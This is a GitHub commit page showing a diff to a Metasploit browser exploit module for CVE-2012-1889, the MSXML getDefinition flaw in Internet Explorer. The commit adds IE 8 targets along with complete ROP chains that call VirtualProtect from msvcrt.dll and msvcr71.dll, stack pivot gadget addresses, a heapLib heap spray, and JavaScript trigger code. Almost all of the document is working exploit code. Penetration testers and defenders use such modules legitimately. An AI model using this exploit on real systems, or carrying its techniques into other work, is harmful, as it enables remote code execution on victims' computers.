Permalink
Browse files

Add IE 8 targets

  • Loading branch information...
sinn3r committed Jun 18, 2012
1 parent 68496d3 commit 50269c910aafaa86a93104af81f17b80831f7fbd
Showing with 179 additions and 14 deletions.
  1. +179 −14 modules/exploits/windows/browser/msxml_get_definition_code_exec.rb
@@ -35,6 +35,8 @@ def initialize(info={})
'License' => MSF_LICENSE,
'Author' =>
[
+ 'inking26', # Reliable exploitation
+ 'binjo', # Metasploit module
'sinn3r', # Metasploit module
'juan vazquez' # Metasploit module
],
@@ -43,7 +45,8 @@ def initialize(info={})
[ 'CVE', '2012-1889' ],
[ 'OSVDB', '82873'],
[ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2719615' ],
- [ 'URL', 'http://www.zdnet.com/blog/security/state-sponsored-attackers-using-ie-zero-day-to-hijack-gmail-accounts/12462' ]
+ [ 'URL', 'http://www.zdnet.com/blog/security/state-sponsored-attackers-using-ie-zero-day-to-hijack-gmail-accounts/12462' ],
+ [ 'URL', 'http://hi.baidu.com/inking26/blog/item/9c2ab11c4784e5aa86d6b6c1.html' ]
],
'Payload' =>
{
@@ -60,8 +63,47 @@ def initialize(info={})
[
# msxml3.dll 8.90.1101.0
[ 'Automatic', {} ],
- [ 'IE 6 on Windows XP SP3', { 'Offset' => '0x800 - code.length' } ],
- [ 'IE 7 on Windows XP SP3', { 'Offset' => '0x800 - code.length' } ]
+ [
+ 'IE 6 on Windows XP SP3',
+ {
+ 'Offset' => '0x100',
+ 'Rop' => nil
+ }
+ ],
+ [
+ 'IE 7 on Windows XP SP3',
+ {
+ 'Offset' => '0x100',
+ 'Rop' => nil
+ }
+ ],
+ [
+ 'IE 8 on Windows XP SP3',
+ {
+ 'Rop' => :msvcrt,
+ 'RopChainOffset' => '0x5f4',
+ 'Offset' => '0x0',
+ 'StackPivot' => 0x77c15ed5, # xchg eax, esp # ret # from msvcrt.dll
+ }
+ ],
+ [
+ 'IE 8 with Java 6 on Windows XP SP3',
+ {
+ 'Rop' => :jre,
+ 'RopChainOffset' => '0x5f4',
+ 'Offset' => '0x0',
+ 'StackPivot' => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll
+ }
+ ],
+ [
+ 'IE 8 with Java 6 on Windows 7 SP1',
+ {
+ 'Rop' => :jre,
+ 'RopChainOffset' => '0x5f4',
+ 'Offset' => '0x0',
+ 'StackPivot' => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll
+ }
+ ]
],
'Privileged' => false,
'DisclosureDate' => "Jun 12 2012",
@@ -81,11 +123,102 @@ def get_target(agent)
return targets[1] #IE 6 on Windows XP SP3
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
return targets[2] #IE 7 on Windows XP SP3
+ elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
+ return targets[3] #IE 8 on Windows XP SP3
+ elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8/
+ return targets[5] #IE 8 on Windows 7 SP1
else
return nil
end
end
+ def junk(n=4)
+ return rand_text_alpha(n).unpack("V").first
+ end
+
+ def nop
+ return make_nops(4).unpack("V").first
+ end
+
+ def ret(t)
+ case t['Rop']
+ when :msvcrt
+ return [ 0x77c4ec01 ].pack("V") # RETN (ROP NOP) # msvcrt.dll
+ when :jre
+ return [ 0x7c347f98 ].pack("V") # RETN (ROP NOP) # msvcr71.dll
+ end
+ end
+
+ def popret(t)
+ case t['Rop']
+ when :msvcrt
+ return [ 0x77c4ec00 ].pack("V") # POP EBP # RETN (ROP NOP) # msvcrt.dll
+ when :jre
+ return [ 0x7c376541 ].pack("V") # POP EBP # RETN (ROP NOP) # msvcr71.dll
+ end
+ end
+
+ def get_rop_chain(t)
+
+ adjust = ret(t)
+ adjust << popret(t)
+ adjust << [ t['StackPivot'] ].pack("V")
+ adjust << ret(t) * 4 # first call to a "ret" because there is a good gadget in the stack :)
+
+ # Both ROP chains generated by mona.py - See corelan.be
+ case t['Rop']
+ when :msvcrt
+ print_status("Using msvcrt ROP")
+ rop =
+ [
+ 0x77c4e392, # POP EAX # RETN
+ 0x77c11120, # <- *&VirtualProtect()
+ 0x77c2e493, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
+ junk,
+ 0x77c2dd6c,
+ 0x77c4ec00, # POP EBP # RETN
+ 0x77c35459, # ptr to 'push esp # ret'
+ 0x77c47705, # POP EBX # RETN
+ 0x00001000, # EBX
+ 0x77c3ea01, # POP ECX # RETN
+ 0x77c5d000, # W pointer (lpOldProtect) (-> ecx)
+ 0x77c46100, # POP EDI # RETN
+ 0x77c46101, # ROP NOP (-> edi)
+ 0x77c4d680, # POP EDX # RETN
+ 0x00000040, # newProtect (0x40) (-> edx)
+ 0x77c4e392, # POP EAX # RETN
+ nop, # NOPS (-> eax)
+ 0x77c12df9, # PUSHAD # RETN
+ ].pack("V*")
+
+ when :jre
+ print_status("Using JRE ROP")
+ rop =
+ [
+ 0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
+ 0x00001000, # (dwSize)
+ 0x7c347f98, # RETN (ROP NOP)
+ 0x7c3415a2, # JMP [EAX]
+ 0xffffffff,
+ 0x7c376402, # skip 4 bytes
+ 0x7c345255, # INC EBX # FPATAN # RETN
+ 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
+ 0x7c344f87, # POP EDX # RETN
+ 0x00000040, # flNewProtect
+ 0x7c34d201, # POP ECX # RETN
+ 0x7c38b001, # &Writable location
+ 0x7c347f97, # POP EAX # RETN
+ 0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
+ 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN
+ 0x7c345c30, # ptr to 'push esp # ret '
+ ].pack("V*")
+ end
+
+ code = adjust
+ code << rop
+ return code
+ end
+
def on_request_uri(cli, request)
agent = request.headers['User-Agent']
my_target = get_target(agent)
@@ -97,41 +230,72 @@ def on_request_uri(cli, request)
return
end
- # Set payload depending on target
p = payload.encoded
+ js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
+ js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
+ js_90_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
+ #js_90_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
- js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
- js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
+ if my_target['Rop'].nil?
+ js_shellcode = "var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);"
+ else
+ js_rop = Rex::Text.to_unescape(get_rop_chain(my_target), Rex::Arch.endian(my_target.arch))
+ js_shellcode = <<-JS_ROP
+ var rop_chain = unescape("#{js_rop}");
+ var nops_padding = nops.substring(0, #{my_target['RopChainOffset']}-code.length-offset.length);
+ var shellcode = offset + code + nops_padding + rop_chain + nops_90.substring(0, 0x800-code.length-nops_padding.length-rop_chain.length);
+ JS_ROP
+ js_shellcode = js_shellcode.gsub(/^\t\t\t/, '')
+ end
js = <<-JS
var heap_obj = new heapLib.ie(0x20000);
var code = unescape("#{js_code}");
var nops = unescape("#{js_nops}");
+ var nops_90 = unescape("#{js_90_nops}");
while (nops.length < 0x80000) nops += nops;
+ while (nops_90.length < 0x80000) nops_90 += nops_90;
+
var offset = nops.substring(0, #{my_target['Offset']});
- var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
+ #{js_shellcode}
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x80000-6)/2);
- heap_obj.gc();
- for (var i=1; i < 0xa70; i++) {
+ heap_obj.gc();
+ for (var z=1; z < 0x230; z++) {
heap_obj.alloc(block);
}
JS
js = heaplib(js, {:noobfu => true})
+ object_id = rand_text_alpha(4)
+
+ js_trigger = <<-TRIGGER
+ var obj = document.getElementById('#{object_id}').object;
+ var src = unescape("%u0c08%u0c0c");
+ while (src.length < 0x1002) src += src;
+ src = "\\\\\\\\xxx" + src;
+ src = src.substr(0, 0x1000 - 10);
+ var pic = document.createElement("img");
+ pic.src = src;
+ pic.nameProp;
+ obj.definition(1000);
+ TRIGGER
+
+ js_trigger = heaplib(js_trigger, {:noobfu => true})
+
if datastore['OBFUSCATE']
js = ::Rex::Exploitation::JSObfu.new(js)
js.obfuscate
+ js_trigger =::Rex::Exploitation::JSObfu.new(js_trigger)
+ js_trigger.obfuscate
end
- object_id = rand_text_alpha(4)
-
html = <<-EOS
<html>
<head>
@@ -140,14 +304,15 @@ def on_request_uri(cli, request)
</script>
</head>
<body>
- <object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id="#{object_id}"></object><script>
- document.getElementById("#{object_id}").object.definition(#{rand(1000)+1});
+ <object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id="#{object_id}"></object>
+ <script>
+ #{js_trigger}
</script>
</body>
</html>
EOS
- html = html.gsub(/^\t/, '')
+ html = html.gsub(/^\t\t/, '')
print_status("#{cli.peerhost}:#{cli.peerport} - Sending html")
send_response(cli, html, {'Content-Type'=>'text/html'})

0 comments on commit 50269c9

Please sign in to comment.